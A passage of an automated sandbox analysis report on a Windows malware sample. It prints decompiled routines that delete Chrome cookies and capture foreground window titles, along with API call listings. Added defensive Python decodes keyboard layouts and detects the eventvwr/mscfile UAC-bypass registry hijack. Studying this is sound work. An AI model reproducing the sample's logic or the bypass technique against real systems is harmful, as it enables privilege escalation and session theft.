                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                        • String ID:
                                        • API String ID: 3751107300-0
                                        • Opcode ID: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                        • Opcode Fuzzy Hash: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%
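                                         What the GetKeyboardLayoutNameA call at 0040D9AF actually yields, as an added example (not the report's output and not the sample's code): the listing only shows the layout name being fetched and concatenated into a string, but the value is the check behind the "Country aware sample found (crashes after keyboard check)" signature in the overview. The decoder below turns the 8-hex-digit KLID into a Windows LANGID and splits it into primary and sub-language; the blocked-language set passed to layout_in_set is an assumption for illustration, not something read from the sample.

```python
"""Decode a keyboard-layout identifier (KLID) as returned by
GetKeyboardLayoutNameA.  Added example, not code from the report or the sample.
Format (documented by Microsoft): 8 hex digits; the low 16 bits are a Windows
LANGID, whose low 10 bits give the primary language and high 6 bits the
sub-language (region).  The high 16 bits mark layout variants such as Dvorak
and do not change the language."""
import re
from typing import Dict, Iterable

# Primary-language identifiers (winnt.h LANG_* constants).
LANG_ENGLISH = 0x09
LANG_SPANISH = 0x0A
LANG_RUSSIAN = 0x19

_KLID_RE = re.compile(r"[0-9A-Fa-f]{8}")


def klid_to_langid(klid: str) -> int:
    """"00000409" -> 0x0409.  Rejects anything that is not exactly 8 hex digits."""
    if not _KLID_RE.fullmatch(klid):
        raise ValueError(f"KLID must be 8 hex digits, got {klid!r}")
    return int(klid, 16) & 0xFFFF


def primary_language(langid: int) -> int:
    """Low 10 bits of a LANGID."""
    return langid & 0x3FF


def sub_language(langid: int) -> int:
    """High 6 bits of a LANGID (region: 1 = US English, 2 = Mexican Spanish, ...)."""
    return (langid >> 10) & 0x3F


def describe(klid: str) -> Dict[str, int]:
    langid = klid_to_langid(klid)
    return {"langid": langid,
            "primary": primary_language(langid),
            "sub": sub_language(langid)}


def layout_in_set(klid: str, primaries: Iterable[int]) -> bool:
    """Shape of a locale gate: True when the active layout's primary language
    is in the caller's set.  The set is the caller's assumption, not the sample's."""
    return primary_language(klid_to_langid(klid)) in set(primaries)


if __name__ == "__main__":
    for k in ("00000409", "00010409", "0000080A", "00000419"):
        verdict = "gated" if layout_in_set(k, {LANG_RUSSIAN}) else "runs"
        print(k, describe(k), verdict)
```

                                         A sandbox that wants to exercise the gated path only has to change the active input locale before detonation; the variant bits in the high word ("00010409", US Dvorak) decode to the same language as "00000409", so a gate keyed on the primary language is not bypassed by switching layout variants.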

                                        APIs
                                        • GetWindowTextW.USER32 ref: 0040EAAF
                                        • IsWindowVisible.USER32(?), ref: 0040EAB8
                                        • sprintf.MSVCRT ref: 0040EACF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                        • String ID:
                                        • API String ID: 1480451481-0
                                        • Opcode ID: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                        • Opcode Fuzzy Hash: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 32%
                                        			E004071CF() {
                                        				char _v5;
                                        				char _v6;
                                        				char _v24;
                                        				void* _v40;
                                        				char* _t12;
                                        				CHAR* _t13;
                                        				long _t20;
                                        				char* _t21;
                                        				void* _t25;
                                        
                                        				_t12 = getenv("UserProfile");
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                        				_t13 =  &_v24;
                                        				L00414170();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				if(DeleteFileA(_t13) != 0) {
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                        					E00407A90("\n[Chrome Cookies found, cleared!]");
                                        					_t25 = 1;
                                        					L8:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return _t25;
                                        				}
                                        				_t20 = GetLastError();
                                        				if(_t20 == 0) {
                                        					_t21 =  &_v6;
                                        					L5:
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                        					E00407A90("\n[Chrome Cookies not found]");
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return 1;
                                        				}
                                        				if(_t20 == 1) {
                                        					_t21 =  &_v5;
                                        					goto L5;
                                        				}
                                        				_t25 = 0;
                                        				goto L8;
                                         			}

                                        APIs
                                        • getenv.MSVCRT ref: 004071E4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                        • GetLastError.KERNEL32 ref: 0040721F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                        Strings
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                        • UserProfile, xrefs: 004071DF
                                        • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                        • [Chrome Cookies not found], xrefs: 00407239
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 3740952235-304995407
                                        • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                        • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                        Uniqueness

                                        Uniqueness Score: -1.00%
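                                         Detection logic for two behaviours shown in this section, as an added example (not part of the report and not the sample's code): the function at 0040311C-004031CC writes Software\Classes\mscfile\shell\open\command and then ShellExecuteW("open", "eventvwr.exe"), which is the auto-elevating Event Viewer handler hijack (HKCU\Software\Classes takes precedence over HKLM when the .msc handler is resolved, so no privilege is needed to plant it; the legitimate child of eventvwr.exe is mmc.exe); and E004071CF deletes Chrome's User Data\Default\Cookies from %UserProfile%. The events below are constructed and shaped like Sysmon records (ID 13 RegistryEvent, ID 1 ProcessCreate, ID 23/26 FileDelete); the field names, PIDs, timestamps and the 300-second correlation window are assumptions of the example.

```python
"""Two detections over constructed endpoint events (added example; the event
shape, PIDs and timestamps are invented, not taken from the report):
  * mscfile handler hijack: a write to ...\Software\Classes\mscfile\shell\open\command,
    eventvwr.exe starting shortly after, and eventvwr.exe spawning something
    other than mmc.exe (the payload the hijacked handler points at).
  * a non-browser process deleting Chrome's Cookies / Login Data store."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

MSCFILE_CMD = r"\software\classes\mscfile\shell\open\command"
CHROME_STORES = (r"\google\chrome\user data\default\cookies",
                 r"\google\chrome\user data\default\login data")
BROWSER_IMAGES = (r"\chrome.exe",)


@dataclass
class Event:
    ts: int            # seconds (constructed)
    kind: str          # "reg_set" | "proc_create" | "file_delete"
    pid: int
    image: str         # image of the process that generated the event
    ppid: int = 0      # parent pid, proc_create only
    target: str = ""   # registry path (reg_set) or deleted file path (file_delete)


def detect_mscfile_uac_bypass(events: List[Event], window_s: int = 300) -> List[Tuple[int, int, int]]:
    """Return (hijacker_pid, eventvwr_pid, payload_pid) for each completed hijack."""
    hijack_ts: Dict[int, int] = {}   # hijacker pid -> time of the handler write
    launched: Dict[int, int] = {}    # eventvwr.exe pid -> hijacker pid
    findings: List[Tuple[int, int, int]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        img = ev.image.lower()
        if ev.kind == "reg_set" and MSCFILE_CMD in ev.target.lower():
            # The key does not exist under HKCU on a clean system; any write is notable.
            hijack_ts[ev.pid] = ev.ts
        elif ev.kind == "proc_create" and img.endswith(r"\eventvwr.exe"):
            recent = [p for p, t in hijack_ts.items() if 0 <= ev.ts - t <= window_s]
            if recent:
                launched[ev.pid] = recent[-1]
        elif ev.kind == "proc_create" and ev.ppid in launched and not img.endswith(r"\mmc.exe"):
            # eventvwr.exe normally resolves eventvwr.msc to mmc.exe; anything else is the payload.
            findings.append((launched[ev.ppid], ev.ppid, ev.pid))
    return findings


def detect_browser_store_deletion(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (pid, path) for deletions of Chrome credential/cookie stores by non-browser processes."""
    findings: List[Tuple[int, str]] = []
    for ev in events:
        if ev.kind != "file_delete":
            continue
        path = ev.target.lower()
        if any(path.endswith(s) for s in CHROME_STORES) and not ev.image.lower().endswith(BROWSER_IMAGES):
            findings.append((ev.pid, ev.target))
    return findings


# Constructed sample timeline: the sample's own path is the one shown in the report.
SAMPLE = r"C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe"
COOKIES = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"
EVENTS = [
    Event(100, "proc_create", 4100, SAMPLE, ppid=3000),
    Event(101, "file_delete", 4100, SAMPLE, target=COOKIES),
    Event(102, "reg_set", 4100, SAMPLE,
          target=r"HKU\S-1-5-21-1000\Software\Classes\mscfile\shell\open\command\(Default)"),
    Event(103, "proc_create", 4200, r"C:\Windows\System32\eventvwr.exe", ppid=4100),
    Event(104, "proc_create", 4300, SAMPLE, ppid=4200),
    # benign: Chrome rewriting its own cookie store, and a user opening Event Viewer
    Event(500, "file_delete", 6000, r"C:\Program Files\Google\Chrome\Application\chrome.exe", target=COOKIES),
    Event(900, "proc_create", 5000, r"C:\Windows\System32\eventvwr.exe", ppid=1234),
    Event(901, "proc_create", 5001, r"C:\Windows\System32\mmc.exe", ppid=5000),
]

if __name__ == "__main__":
    print("UAC bypass:", detect_mscfile_uac_bypass(EVENTS))
    print("store deletion:", detect_browser_store_deletion(EVENTS))
```

                                         The bypass rule keys on the chain rather than on any single event because each piece alone is noisy: the registry write is the strongest signal, but an eventvwr.exe launch with a non-mmc.exe child also catches a hijack planted earlier by a process that is no longer running. The deletion rule excludes chrome.exe by image name only; a hardened version would also check the signer.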

                                        APIs
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                        • String ID:
                                        • API String ID: 257471410-0
                                        • Opcode ID: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                        • Opcode Fuzzy Hash: 6207ffe4a099ce9ea2bf100b0fc1d7ab3a8a9b3eb8558767b37f4f87605fa35e
                                        • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 30%
                                        			E00412F73(char _a4, void* _a20) {
                                        				char _v5;
                                        				void* _v24;
                                        				char _v40;
                                        				int _t26;
                                        				int _t29;
                                        				void* _t37;
                                        				unsigned int _t66;
                                        				signed int _t67;
                                        				int _t70;
                                        				signed short _t73;
                                        				struct HWND__* _t81;
                                        				void* _t83;
                                        
                                        				_t81 = GetForegroundWindow();
                                        				_t26 = GetWindowTextLengthA(_t81);
                                        				_t89 = _t26;
                                        				if(_t26 <= 0) {
                                        					L6:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					return 0;
                                        				}
                                        				_t28 = _t26 + 1;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
                                        				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                        				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                        				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
                                        				E00413A29(_t29, _t29, _t29, __imp__tolower);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
                                        				_t73 = 0;
                                        				if(E00401838( &_v40) <= 0) {
                                        					L5:
                                        					E004017DD( &_v40);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					goto L6;
                                        				}
                                        				_t82 = 0;
                                        				while(1) {
                                        					_t37 = E0040180C( &_v40, 0, _t82);
                                        					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
                                        					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                        						break;
                                        					}
                                        					_t73 = _t73 + 1;
                                        					_t82 = _t73 & 0x0000ffff;
                                        					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
                                        						continue;
                                        					}
                                        					goto L5;
                                        				}
                                        				__eflags = _a20;
                                        				if(_a20 != 0) {
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					asm("repne scasb");
                                        					_t66 =  !( &_v24 | 0xffffffff);
                                        					_t83 = _t37 - _t66;
                                        					_t67 = _t66 >> 2;
                                        					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
                                        					__eflags = _t70;
                                        					memcpy(_t83 + _t67 + _t67, _t83, _t70);
                                        				}
                                        				E004017DD( &_v40);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 1;
                                        			}

                                        APIs
                                        • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                        • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                        • GetWindowTextA.USER32 ref: 00412FB8
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                        • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                        • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
